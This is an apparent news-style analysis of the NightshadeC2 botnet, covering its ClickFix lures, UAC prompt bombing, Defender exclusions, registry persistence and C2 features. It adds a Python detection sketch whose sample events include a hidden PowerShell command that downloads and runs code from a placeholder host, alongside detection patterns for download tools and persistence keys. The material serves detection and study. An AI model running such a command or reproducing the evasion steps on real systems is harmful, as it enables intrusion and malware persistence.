New NightshadeC2 Botnet Uses ‘UAC Prompt Bombing’ to Bypass Windows Defender Protections

Cybersecurity: NightshadeC2 Botnet Analysis
In early August 2025, security experts identified a new botnet strain, NightshadeC2, capable of bypassing Windows Defender protections. This malware employs both C and Python-based payloads to gain persistent remote control over compromised systems.
Infection Vectors
NightshadeC2 commonly initiates infections through customized “ClickFix” landing pages, which trick users into pasting a command into the Windows Run dialog and executing it themselves. It is also distributed through trojanized installers of popular utilities such as Advanced IP Scanner, CCleaner, and various VPN clients.
Technical Execution
Upon execution, NightshadeC2 obtains elevated privileges, weakens Defender by disabling or excluding components from scanning, and connects to its command-and-control infrastructure. A distinctive .NET-based loader delivers the final payload; the loader's evasion routines include the “UAC Prompt Bombing” technique described below.
Stealth and Evasion Techniques
The loader implements a routine the researchers call “UAC Prompt Bombing”: it re-issues its elevation request in a loop, so the UAC consent dialog reappears each time the user declines, until the user gives in and clicks Yes. The loop wears down real users and also confounds automated analysis that dismisses only the first prompt. With the elevated token it then adds the malware's components to Defender's scan exclusion list and writes persistence entries in registry locations such as Winlogon, RunOnce, and Active Setup.
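The ClickFix delivery and the post-elevation artifacts above leave a recognizable trail in endpoint telemetry. The following detection sketch is an added example, not code from the original article or from the researchers who analyzed NightshadeC2. It runs over constructed Sysmon-style events (process creation and registry value set), and the host names, paths, GUID, command lines and timestamps in the sample are invented. The thresholds for “prompt bombing” (five UAC prompts within 60 seconds) are assumptions for illustration; what is not an assumption is that Windows launches one consent.exe instance per UAC prompt, which is why a burst of consent.exe launches is a usable signal.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Sysmon-style events (not real NightshadeC2 telemetry).
# id 1 = process creation, id 13 = registry value set. Hosts, paths,
# the Active Setup GUID and timestamps are invented for this example.
SAMPLE_EVENTS = [
    # ClickFix: command pasted into the Run dialog, so explorer.exe is the parent
    {"ts": "2025-08-05T10:00:00", "id": 1, "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm http://example.invalid/fix)"'},
    # five UAC consent dialogs in under a minute (one consent.exe per prompt)
    *[{"ts": f"2025-08-05T10:00:{s:02d}", "id": 1, "host": "WS01",
       "image": r"C:\Windows\System32\consent.exe",
       "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "consent.exe 1234 456 0"}
      for s in (7, 12, 18, 25, 33)],
    # post-elevation: Defender exclusion, then persistence writes
    {"ts": "2025-08-05T10:01:02", "id": 13, "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\svc",
     "details": "DWORD (0x00000000)"},
    {"ts": "2025-08-05T10:01:03", "id": 13, "host": "WS01",
     "image": r"C:\Users\Public\svc\svc.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-EXAMPLE-0000}\StubPath",
     "details": r"C:\Users\Public\svc\svc.exe"},
    {"ts": "2025-08-05T10:01:04", "id": 13, "host": "WS01",
     "image": r"C:\Users\Public\svc\svc.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "details": r"explorer.exe, C:\Users\Public\svc\svc.exe"},
    # benign noise on another host: Run-dialog notepad and a single UAC prompt
    {"ts": "2025-08-05T11:00:00", "id": 1, "host": "WS02",
     "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    {"ts": "2025-08-05T11:00:05", "id": 1, "host": "WS02",
     "image": r"C:\Windows\System32\consent.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "consent.exe 999 1 0"},
]

# Interpreters and download utilities commonly launched by ClickFix lures.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "bitsadmin.exe", "certutil.exe", "wscript.exe", "cscript.exe"}
CLICKFIX_MARKERS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc|\biex\b|\birm\b|invoke-|https?://)", re.I)

DEFENDER_EXCL = re.compile(
    r"^HK(LM|EY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\", re.I)
PERSIST_KEYS = [
    ("winlogon", re.compile(r"\\CurrentVersion\\Winlogon\\(Shell|Userinit)$", re.I)),
    ("runonce", re.compile(r"\\CurrentVersion\\RunOnce\\", re.I)),
    ("active_setup", re.compile(r"\\Active Setup\\Installed Components\\[^\\]+\\StubPath$", re.I)),
]

# Assumed thresholds: this many UAC prompts within this window on one host.
UAC_BOMB_COUNT = 5
UAC_BOMB_WINDOW = timedelta(seconds=60)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return alerts, in time order, for the behaviours described in the article."""
    alerts = []
    consent_times = defaultdict(deque)   # host -> recent consent.exe launch times
    bombed_hosts = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        host = ev["host"]
        if ev["id"] == 1:
            img = _basename(ev["image"])
            if (_basename(ev["parent"]) == "explorer.exe" and img in LOLBINS
                    and CLICKFIX_MARKERS.search(ev["cmdline"])):
                alerts.append({"host": host, "ts": ev["ts"], "rule": "clickfix_run_prompt",
                               "detail": ev["cmdline"]})
            elif img == "consent.exe":
                q = consent_times[host]
                q.append(ts)
                while q and ts - q[0] > UAC_BOMB_WINDOW:   # slide the window
                    q.popleft()
                if len(q) >= UAC_BOMB_COUNT and host not in bombed_hosts:
                    bombed_hosts.add(host)
                    alerts.append({"host": host, "ts": ev["ts"], "rule": "uac_prompt_bombing",
                                   "detail": f"{len(q)} UAC prompts within {UAC_BOMB_WINDOW.seconds}s"})
        elif ev["id"] == 13:
            tgt = ev["target"]
            if DEFENDER_EXCL.search(tgt):
                alerts.append({"host": host, "ts": ev["ts"], "rule": "defender_exclusion_added",
                               "detail": tgt, "post_uac_bombing": host in bombed_hosts})
            for name, rx in PERSIST_KEYS:
                if rx.search(tgt):
                    alerts.append({"host": host, "ts": ev["ts"], "rule": f"persistence_{name}",
                                   "detail": f"{tgt} = {ev['details']}",
                                   "post_uac_bombing": host in bombed_hosts})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["ts"], a["host"], a["rule"], a["detail"])
```

The `post_uac_bombing` flag is the useful correlation: a Defender exclusion or a Winlogon/Active Setup write on its own has legitimate causes (software installers do both), but one that lands on a host that just produced a burst of UAC prompts, shortly after an interpreter was spawned from the Run dialog, is the sequence the article describes and deserves a high-severity alert.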
Communication and Control
Once installed, the malware communicates with its command-and-control server over TCP, typically on port 80, 443, or a high-numbered port. It collects system details to build a unique host fingerprint, then opens an RC4-encrypted session over which it receives further commands, including reverse shell initiation, payload download, and keylogging.
Implications
NightshadeC2’s ability to slip past both automated analysis and manual review makes it a significant threat: its operators can steal credentials from browsers, launch hidden browser sessions, and maintain long-term persistence within targeted networks.